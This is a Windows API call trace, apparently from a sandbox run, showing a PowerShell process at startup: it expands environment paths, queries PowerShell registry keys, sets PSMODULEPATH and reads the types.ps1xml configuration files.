	[0571.200] CoTaskMemAlloc (cb=0xcc) returned 0x3fff60
	[0571.200] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3fff60, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0571.200] CoTaskMemFree (pv=0x3fff60) 
	[0571.200] CoTaskMemAlloc (cb=0xcc) returned 0x3fff60
	[0571.200] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3fff60, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0571.201] CoTaskMemFree (pv=0x3fff60) 
	[0571.204] RegCloseKey (hKey=0x31c) returned 0x0
	[0571.204] CoTaskMemAlloc (cb=0xcc) returned 0x3fff60
	[0571.204] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3fff60, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0571.204] CoTaskMemFree (pv=0x3fff60) 
	[0571.204] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed708 | out: phkResult=0x1ed708*=0x31c) returned 0x0
	[0571.205] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed68c, lpData=0x0, lpcbData=0x1ed688*=0x0 | out: lpType=0x1ed68c*=0x0, lpData=0x0, lpcbData=0x1ed688*=0x0) returned 0x2
	[0571.205] RegCloseKey (hKey=0x31c) returned 0x0
	[0571.208] CoTaskMemAlloc (cb=0x20c) returned 0x3fb4c0
	[0571.211] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3fb4c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0572.742] CoTaskMemFree (pv=0x3fb4c0) 
	[0572.742] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0572.743] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0572.749] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0572.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.749] CoTaskMemFree (pv=0x40a230) 
	[0572.751] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0572.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.751] CoTaskMemFree (pv=0x40a230) 
	[0572.766] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0572.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.766] CoTaskMemFree (pv=0x40a230) 
	[0572.766] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0572.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.766] CoTaskMemFree (pv=0x40a230) 
	[0572.768] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed4f8 | out: phkResult=0x1ed4f8*=0x324) returned 0x0
	[0572.769] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed50c, lpData=0x0, lpcbData=0x1ed508*=0x0 | out: lpType=0x1ed50c*=0x1, lpData=0x0, lpcbData=0x1ed508*=0x74) returned 0x0
	[0572.770] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed47c, lpData=0x0, lpcbData=0x1ed478*=0x0 | out: lpType=0x1ed47c*=0x1, lpData=0x0, lpcbData=0x1ed478*=0x74) returned 0x0
	[0572.770] CoTaskMemAlloc (cb=0x78) returned 0x3a0a60
	[0572.770] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed44c, lpData=0x3a0a60, lpcbData=0x1ed448*=0x74 | out: lpType=0x1ed44c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed448*=0x74) returned 0x0
	[0572.770] CoTaskMemFree (pv=0x3a0a60) 
	[0572.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0572.770] SetErrorMode (uMode=0x1) returned 0x1
	[0572.770] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed3d0 | out: lpFileInformation=0x1ed3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0572.770] SetErrorMode (uMode=0x1) returned 0x1
	[0572.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0572.771] SetErrorMode (uMode=0x1) returned 0x1
	[0572.771] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed3d0 | out: lpFileInformation=0x1ed3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0572.771] SetErrorMode (uMode=0x1) returned 0x1
	[0572.774] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0572.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.774] CoTaskMemFree (pv=0x40a230) 
	[0572.775] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0572.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.776] CoTaskMemFree (pv=0x40a230) 
	[0572.776] GetACP () returned 0x4e4
	[0574.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0574.380] SetErrorMode (uMode=0x1) returned 0x1
	[0574.381] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0574.381] GetFileType (hFile=0x328) returned 0x1
	[0574.381] SetErrorMode (uMode=0x1) returned 0x1
	[0574.381] GetFileType (hFile=0x328) returned 0x1
	[0574.382] ReadFile (in: hFile=0x328, lpBuffer=0x2e11350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2e11350*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0574.384] ReadFile (in: hFile=0x328, lpBuffer=0x2e11350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2e11350*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0574.384] ReadFile (in: hFile=0x328, lpBuffer=0x2e11350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2e11350*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0574.385] ReadFile (in: hFile=0x328, lpBuffer=0x2e11350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2e11350*, lpNumberOfBytesRead=0x1ed308*=0xcf3, lpOverlapped=0x0) returned 1
	[0574.385] ReadFile (in: hFile=0x328, lpBuffer=0x2e107ab, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2e107ab*, lpNumberOfBytesRead=0x1ed308*=0x0, lpOverlapped=0x0) returned 1
	[0574.385] ReadFile (in: hFile=0x328, lpBuffer=0x2e11350, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2e11350*, lpNumberOfBytesRead=0x1ed308*=0x0, lpOverlapped=0x0) returned 1
	[0574.386] CloseHandle (hObject=0x328) returned 1
	[0574.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0574.389] SetErrorMode (uMode=0x1) returned 0x1
	[0574.389] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed280 | out: lpFileInformation=0x1ed280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0574.390] SetErrorMode (uMode=0x1) returned 0x1
	[0574.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0574.392] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed368 | out: phkResult=0x1ed368*=0x328) returned 0x0
	[0574.392] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed2ec, lpData=0x0, lpcbData=0x1ed2e8*=0x0 | out: lpType=0x1ed2ec*=0x1, lpData=0x0, lpcbData=0x1ed2e8*=0x56) returned 0x0
	[0574.392] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a1890
	[0574.392] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed2bc, lpData=0x1b9a1890, lpcbData=0x1ed2b8*=0x56 | out: lpType=0x1ed2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed2b8*=0x56) returned 0x0
	[0574.392] CoTaskMemFree (pv=0x1b9a1890) 
	[0574.392] RegCloseKey (hKey=0x328) returned 0x0
	[0574.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0574.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0575.746] VirtualQuery (in: lpAddress=0x1ec050, lpBuffer=0x1ecf10, dwLength=0x30 | out: lpBuffer=0x1ecf10*(BaseAddress=0x1ec000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0575.760] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0575.760] GetFileType (hFile=0x324) returned 0x1
	[0575.760] SetErrorMode (uMode=0x1) returned 0x1
	[0575.760] GetFileType (hFile=0x324) returned 0x1
	[0575.760] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.761] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.761] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.761] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.761] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.762] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.762] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.762] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.762] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.764] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.764] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.765] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.765] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.765] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.766] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.766] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0575.766] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.269] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.269] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.269] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.270] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.270] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.271] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.271] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.271] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.272] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.272] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.272] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.273] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.273] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.274] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.274] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.274] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.280] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.280] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.281] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.281] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.281] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.282] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.282] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.282] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1000, lpOverlapped=0x0) returned 1
	[0577.283] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x1b4, lpOverlapped=0x0) returned 1
	[0577.283] ReadFile (in: hFile=0x324, lpBuffer=0x2ce2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed308, lpOverlapped=0x0 | out: lpBuffer=0x2ce2180*, lpNumberOfBytesRead=0x1ed308*=0x0, lpOverlapped=0x0) returned 1
	[0577.283] CloseHandle (hObject=0x324) returned 1
	[0577.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ed020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0577.283] SetErrorMode (uMode=0x1) returned 0x1
	[0577.283] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed280 | out: lpFileInformation=0x1ed280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0577.283] SetErrorMode (uMode=0x1) returned 0x1
	[0577.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0577.283] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed368 | out: phkResult=0x1ed368*=0x324) returned 0x0
